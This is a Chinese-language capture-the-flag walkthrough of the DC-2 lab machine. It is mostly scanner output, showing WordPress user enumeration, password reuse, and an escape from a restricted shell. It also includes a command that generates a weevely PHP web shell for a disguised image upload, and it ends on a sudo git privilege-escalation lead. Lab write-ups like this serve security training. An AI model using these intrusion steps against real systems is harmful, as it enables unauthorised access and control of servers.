$ nmap -A 192.168.242.131 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 06:24 EDT Nmap scan report for 192.168.242.131 Host is up (0.00100s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Did not follow redirect to http://dc-2/ |_https-redirect: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.04 seconds
看起来有点问题
实际上nmap并不认识dc-2是什么.dns上也不认识
nmap 说:http-title: Did not follow redirect to http://dc-2/
nmap需要一点点小小的帮助
我们也可以这么做
1
sudo vim /etc/hosts
我们需要增加一行
1
192.168.242.131 dc-2
现在保存它
按下 并且输入
:wq
再次nmap
tips:
如果扫描使得在真实环境下渗透时间更多 可以尝试边浏览一下对方网页或者对方机器的端口
如22/21/80/443/445
1 2 3 4 5 6 7 8 9 10 11 12 13 14
$ nmap -A 192.168.242.131 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 06:31 EDT Nmap scan report for dc-2 (192.168.242.131) Host is up (0.00014s latency) Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-generator: WordPress 4.7.10 |_http-server-header: Apache/2.4.10 (Debian) |_http-title: DC-2 – Just another WordPress site |_https-redirect: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.38 seconds
[~] The config file is expected to be at "/home/kali/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.242.131:80 Open 192.168.242.131:7744 [~] Starting Nmap [>] The Nmap command to be run is nmap -A -vvv -p 80,7744 192.168.242.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 12:05 EDT NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 12:05 Completed NSE at 12:05, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 12:05 Completed NSE at 12:05, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 12:05 Completed NSE at 12:05, 0.00s elapsed Initiating Ping Scan at 12:05 Scanning 192.168.242.131 [2 ports] Completed Ping Scan at 12:05, 0.00s elapsed (1 total hosts) Initiating Connect Scan at 12:05 Scanning dc-2 (192.168.242.131) [2 ports] Discovered open port 80/tcp on 192.168.242.131 Discovered open port 7744/tcp on 192.168.242.131 Completed Connect Scan at 12:05, 0.00s elapsed (2 total ports) Initiating Service scan at 12:05 Scanning 2 services on dc-2 (192.168.242.131) Completed Service scan at 12:05, 6.03s elapsed (2 services on 1 host) NSE: Script scanning 192.168.242.131. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 12:05 Completed NSE at 12:05, 0.95s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 12:05 Completed NSE at 12:05, 0.06s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 12:05 Completed NSE at 12:05, 0.00s elapsed Nmap scan report for dc-2 (192.168.242.131) Host is up, received syn-ack (0.00030s latency). Scanned at 2020-10-08 12:05:52 EDT for 7s
PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack Apache httpd 2.4.10 ((Debian)) |_http-generator: WordPress 4.7.10 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.10 (Debian) |_http-title: DC-2 – Just another WordPress site |_https-redirect: ERROR: Script execution failed (use -d to debug) 7744/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAMT3xv0ReIK733JHqB5o5t1Knur7MHfTeYoqdn2fxpfdk79iDYAD46e/C1hLs6R0CH1fSWfpJ0x45g77ZaEn/nOaR2UXiod20R6kyrAPyL4UELizECoJ9MdHSULedr0+4QcXhtUZ+4b76umJhENpOhH+vZjrjMI5uZo+EMjlylxFAAAAFQDzg8StOWpV7J5ZjSfIdcddFgqB/QAAAIA84WMMKmOEkvzgQZLuW5lTTecIrk+UXJyWVZSZFxvFbnt5mUvEzPBMqPZIo1h1dkzpEp1Xpk9Vb16LMrQcS6LgH8yhlo5402lUCfP6onxVNvGvP5uhLoQVjzPd65ZKJ7J1VSoz9xOmPkWr2HFuCf6XOBXy8WCxqZxWYTYERTuexgAAAIAI8DjfDmIjv0jUBAPZu0crpPoxvK4ZvdEy6UbfjK+pZYzkd6qnVLdWrvP9evbWaA5VoDZjWp1301VjX8Y1pqHFVaRUu3OBY7DgidJXA3zLd1BSdPzYfRJSZ1/xN75Yo13wW6XIEsy1kvUNOwA0Nm6zmcQ+SN/aBITwGOIBGrp06w== | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDC92AIbO8wDuOXLMCrnJkTKDLxXzpwFY0EI4urz6cZpmOjGOZYbWz6Ele1sM3WXEWmOWkszLrMbVEFmuYan545oIHnylYX6ZY+eMPjJBRH/VDukRsNtAA8VRsvIkfCtcG5J9zAQTQDYYprEJljKPYavf4bIW3NZb0v57O01tGylLh23ZSfGpTmQXx+GsWet9vnbCr1+bzf/QeZ7PNK9BeBsLJsvWgLQmuaTdBYeW1b415xOaszWrutHQoaBdud/SPX1Uvy2PNFUfKIPjdbmAdRxTAvRHHaMTRdrvEhdJWz3wmefXr9e3S3YEu05USTqhMwi6OBxeqkjc+6mdR/PYR9 | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE329BkKjKxz7Y23cZSshQ76Ge3DFsJsTO89pgaInzX6w5G3h6hU3xDVMD8G8BsW3V0CwXWt1fTnT3bUc+JhdcE= | 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGyWHwWC3fLufEnM1R2zsvjMZ1TovPCp3mky/2s+wXTH Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan Initiating NSE at 12:05 Completed NSE at 12:05, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 12:05 Completed NSE at 12:05, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 12:05 Completed NSE at 12:05 , 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 7.33 seconds
看起来又快又好
于此同时我们浏览上site 跑起wpscan
于是在浏览器中我们得到了第一个flag
1 2 3 4 5 6 7 8 9
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords isalways better, but sometimes you just can’t win them all.
WordPress Security Scanner by the WPScan Team Version 3.8.7 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________
[i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]N [+] URL: http://dc-2/ [192.168.242.131] [+] Started: Thu Oct 8 06:45:17 2020
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://dc-2/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03). | Found By: Rss Generator (Passive Detection) | - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> | - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
[+] WordPress theme in use: twentyseventeen | Location: http://dc-2/wp-content/themes/twentyseventeen/ | Last Updated: 2020-08-11T00:00:00.000Z | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.4 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) | - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
WordPress Security Scanner by the WPScan Team Version 3.8.7 Sponsored by Automattic - https://automattic.com/ @_WPScan_,@ethicalhack3r,@erwan_lr,@firefart _______________________________________________________________
[i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N][+] URL: http://dc-2/ [192.168.242.131] [+] Started: Thu Oct 8 06:58:04 2020
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://dc-2/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03). | Found By: Rss Generator (Passive Detection) | - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> | - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
[+] WordPress theme in use: twentyseventeen | Location: http://dc-2/wp-content/themes/twentyseventeen/ | Last Updated: 2020-08-11T00:00:00.000Z | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.4 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) | - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] jerry | Found By: Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection)
[+] tom | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
WordPress Security Scanner by the WPScan Team Version 3.8.7 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________
[i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N][+] URL: http://dc-2/ [192.168.242.131] [+] Started: Thu Oct 809:22:222020
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://dc-2/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03). | Found By: Rss Generator (Passive Detection) | - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> | - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
[+] WordPress theme in use: twentyseventeen | Location: http://dc-2/wp-content/themes/twentyseventeen/ | Last Updated: 2020-08-11T00:00:00.000Z | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.4 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) | - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY,to the extent permitted by applicable law. tom@DC-2:~$ ls flag3.txt usr
但是cat head tail常见的输出指令都被ban了
经过测试唯一可行的指令成为了 less和echo
因此我们可以..
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
tom@DC-2:~$ for line in $(<flag3.txt); doecho$line; done#替代指令为 less Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
tom@DC-2:~$ compgen -u root daemon bin sys sync games man lp mail news uucp proxy www-data backup list irc gnats nobody systemd-timesync systemd-network systemd-resolve systemd-bus-proxy Debian-exim messagebus statd sshd mysql tom jerry
[~] The config file is expected to be at "/root/.rustscan.toml" [~] Automatically increasing ulimit value to 5000. Open 192.168.242.131:80 Open 192.168.242.131:7744 [~] Starting Nmap [>] The Nmap command to be run is nmap -A --script vuln -vvv -p 80,7744 192.168.242.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-22 02:59 EDT NSE: Loaded 149 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 02:59 Completed NSE at 02:59, 10.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 02:59 Completed NSE at 02:59, 0.00s elapsed Initiating ARP Ping Scan at 02:59 Scanning 192.168.242.131 [1 port] Completed ARP Ping Scan at 02:59, 0.04s elapsed (1 total hosts) Initiating SYN Stealth Scan at 02:59 Scanning dc-2 (192.168.242.131) [2 ports] Discovered open port 80/tcp on 192.168.242.131 Discovered open port 7744/tcp on 192.168.242.131 Completed SYN Stealth Scan at 02:59, 0.04s elapsed (2 total ports) Initiating Service scan at 02:59 Scanning 2 services on dc-2 (192.168.242.131) Completed Service scan at 02:59, 6.04s elapsed (2 services on 1 host) Initiating OS detection (try #1) against dc-2 (192.168.242.131) NSE: Script scanning 192.168.242.131. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 02:59 NSE Timing: About 82.31% done; ETC: 03:00(0:00:13 remaining) Completed NSE at 03:00, 81.59s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 03:00 Completed NSE at 03:00, 0.07s elapsed Nmap scan report for dc-2 (192.168.242.131) Host is up, received arp-response (0.00012s latency). Scanned at 2020-10-22 02:59:23 EDT for 89s
PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.10 ((Debian)) |_clamav-exec: ERROR: Script execution failed (use -d to debug) | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=dc-2 | Found the following possible CSRF vulnerabilities: | | Path: http://dc-2:80/index.php/what-we-do/%5c%22 | Form id: search-form-5f919e943a000 | Form action: http://dc-2/ | | Path: http://dc-2:80/index.php/flag/%5c%22 | Form id: search-form-5f919e94bb3ff |_ Form action: http://dc-2/ |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /wp-login.php: Possible admin folder | /readme.html: Wordpress version: 2 | /: WordPress version: 4.7.10 | /wp-includes/images/rss.png: Wordpress version 2.2 found. | /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found. | /wp-includes/images/blank.gif: Wordpress version 2.6 found. | /wp-includes/js/comment-reply.js: Wordpress version 2.7 found. | /wp-login.php: Wordpress login page. | /wp-admin/upgrade.php: Wordpress login page. |_ /readme.html: Interesting, a readme. |_http-jsonp-detection: Couldn't find any JSONP endpoints. |_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable |_http-server-header: Apache/2.4.10 (Debian) |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-wordpress-users: | Username found: admin | Username found: tom | Username found: jerry |_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit' |_https-redirect: ERROR: Script execution failed (use -d to debug) 7744/tcp open ssh syn-ack ttl 64 OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) |_clamav-exec: ERROR: Script execution failed (use -d to debug) MAC Address: 00:0C:29:C6:C1:A4(VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=10/22%OT=80%CT=%CU=39567%PV=Y%DS=1%DC=D%G=N%M=000C29%T OS:M=5F912E24%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=103%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6 OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S)
Uptime guess: 0.010 days (since Thu Oct 22 02:46:02 2020) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.12 ms dc-2 (192.168.242.131)
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 03:00 Completed NSE at 03:00, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 03:00 Completed NSE at 03:00, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 99.63 seconds Raw packets sent: 25 (1.894KB) | Rcvd: 17 (1.366KB)
看起来没什么问题 一个csrf请求漏洞 剩下的啥也没有
渗透又渐渐陷入僵局
surf_again and failure
又开始无事浏览网站中
我看到press this插件 正在尝试一波用图片木马进行一波钓鱼
但是weevely生成php木马后 转换为.php.jpg格式尝试上传
1
weevely generate s3cr3t ~/Path
然而 打开网页之后他会提示我
Unable to create directory wp-content/uploads/2020/10. Is its parent directory writable by the server?
su jerry Password:#此处的password填写之前爆破出来的jerry 密码 这里依旧存在密码复用 #尽管登陆用户密码是相同的但是由于jerry没有设置ssh导致我们无法使用ssh来登陆他
很好 现在切换到了jerry用户
按照惯例
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
jerry@DC-2:/home/tom$ sudo -l MatchingDefaults entries for jerry on DC-2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2: (root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ cat *.txt Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).